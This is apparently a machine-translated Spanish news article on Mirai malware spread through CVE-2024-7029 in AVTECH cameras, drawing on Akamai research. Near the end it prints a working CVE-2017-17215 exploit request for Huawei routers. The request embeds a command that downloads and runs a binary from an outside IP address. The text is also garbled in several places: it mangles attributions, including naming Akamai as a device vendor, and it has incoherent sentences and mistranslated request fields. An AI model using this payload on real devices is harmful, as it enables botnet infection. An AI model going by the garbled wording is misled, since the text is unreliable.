Se están utilizando cámaras de vigilancia de día 0 que no son parcheables para instalar Mirai.

5 min read

Los piratas informáticos maliciosos están explotando vulnerabilidades críticas en cámaras de seguridad ampliamente utilizadas para difundir Mirai, un grupo de malware que secuestra dispositivos infectados de Internet de las cosas en grandes redes para atacar sitios web y otros dispositivos conectados a Internet. El ataque tiene como objetivo el AVM1203. , un dispositivo de vigilancia del fabricante AVTECH con sede en Taiwán y del proveedor de seguridad de red Akamai, dijo hoy Akamai. Desde marzo, atacantes desconocidos han estado explotando una vulnerabilidad de hace 5 años, una vulnerabilidad de día cero que se rastrea en el nombre. CVE-2024-7029 Es fácil de explotar y permite a los atacantes ejecutar código malicioso. AVM1203 ya no se vende ni se admite. Por lo tanto, no hay actualizaciones para abordar problemas críticos de día cero. Esa vez, el ejército heterogéneo sacudió Internet. Akamai dice que los atacantes están aprovechando las vulnerabilidades para poder instalar versiones de Mirai que llegaron en septiembre de 2016, cuando una botnet de dispositivos infectados atacó sitios web de noticias Cyber ​​​​Security Krebs en Security Mirai. ejércitos de cámaras web, enrutadores y otros tipos de dispositivos IoT comprometidos para llevar a cabo ataques distribuidos de denegación de servicio a una escala sin precedentes. Durante las semanas siguientes, la botnet Mirai lanzó ataques contra ISP y otros objetivos. del mismo modo El ataque al proveedor de nombres de dominio dinámico Dyn provoca la parálisis de Internet En un complicado intento de bloquear Mirai, sus creadores lanzaron el malware al público. Este es un movimiento que permite a cualquiera crear su propia botnet que envía DDoS a una escala que alguna vez fue inimaginable. Kyle Lefton, un investigador de seguridad del Equipo de Respuesta e Inteligencia de Seguridad de Akamai, dijo en un correo electrónico que lo había notado. detrás del ataque lanzó el ataque DDoS contra «organizaciones», que no nombró ni explicó más. Hasta ahora, el equipo no ha visto ninguna indicación. Muchos de los actores de amenazas monitorean transmisiones de video o usan cámaras infectadas para otros fines. Akamai detecta actividad usando un «honeypot» de dispositivos que imitan cámaras en la Internet abierta para observar ataques dirigidos. Esta técnica no permite a los investigadores medir el tamaño de una botnet. Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. Advirtió sobre esta vulnerabilidad a principios de este mes; sin embargo, la técnica permitió a Akamai capturar el código utilizado para comprometer el dispositivo. Se dirige a vulnerabilidades que se conocen desde al menos 2019, cuando el código de vulnerabilidad se hizo público. Los investigadores escriben que el valor de día cero está en “El argumento del brillo en el parámetro ‘acción=’” El día cero, descubierto por la investigadora de Akamai Aline Eliovic, no fue reconocido oficialmente hasta este mes. publicando CVE-2024-7029 La publicación del miércoles continúa diciendo: ¿Cómo funciona? Esta vulnerabilidad se descubrió originalmente al examinar nuestros registros de honeypot. La Figura 1 muestra la URL decodificada para mayor claridad. Carga útil descifrada Expand / Fig. 1: Contenido de la carga útil descifrada de un intento de explotación de Akamai Fig. 1: Contenido de la carga útil descifrada de un intento de ataque La vulnerabilidad radica en la función de brillo dentro del archivo. /cgi-bin/supervisor/Factory.cgi (Figura 2) Ampliar/Figura 2: PoC de la explotación de Akamai ¿Qué pasará? En el ejemplo de exploit que observamos Esto es lo que sucede: explotar esta falla permite a un atacante ejecutar código de forma remota en el sistema de destino. La Figura 3 es un ejemplo de un actor de amenazas que explota esta falla para descargar y ejecutar un archivo JavaScript para extraer y cargar la carga útil principal. Lo mismo ocurre con otras botnets. Esta botnet también propaga variantes del malware Mirai a sus objetivos Ampliar/Figura 3: Cadena del descargador de JavaScript Akamai En este caso, la botnet probablemente esté utilizando la variante Corona Mirai, a la que otro proveedor hizo referencia a principios de 2020 en relación con el COVID. -19 virus Al ejecutarse, el malware se conecta a muchos hosts a través de Telnet en los puertos 23, 2323 y 37215. También imprime la cadena «Corona» en la consola del host infectado (Figura 4 Expandir/Figura 4: Ejecución de malware que muestra resultados en la consola de Akamai. Análisis estático de cadenas en la muestra de malware que muestra la ruta de destino. /ctrlt/Actualizacióndedispositivo_1 En un intento de explotar los dispositivos Huawei afectados, CVE-2017-17215 La muestra contiene dos comandos codificados y una dirección IP de control, uno de los cuales es parte del código de explotación. CVE-2017-17215: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Longitud del contenido: 430 Conexión: keep-alive Aceptado: */ * Permisos: rama nombre de usuario=\»dslf-config\», kingdom=\» HuaweiHomeGateway\», nonce=\»88645cefb1f9ede0e336e3569d75ee30\», uri=\»/ctrlt/DeviceUpgrade_1\», respuesta=\»3612f843a42db38f48f59d2a3597e 19c «, algoritmo =\»MD5\», qop=\»auth\ «, nc=00000001, nonce=\ «248d1a2560100669\» $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP) La botnet también ataca otras vulnerabilidades. Varios otros incluyen Hadoop YARN RCE, CVE-2014-8361 y CVE-2017-17215. Hemos observado que estas vulnerabilidades se explotan en la naturaleza muchas veces. y sigue teniendo éxito Porque este modelo de cámara ya no es compatible. El mejor curso de acción para cualquiera que use esta cámara es reemplazarla. Como todos los dispositivos conectados a Internet, no se debe poder acceder a los dispositivos IoT utilizando las credenciales predeterminadas que vienen con ellos.

You May Also Like

More From Author

+ There are no comments

Add yours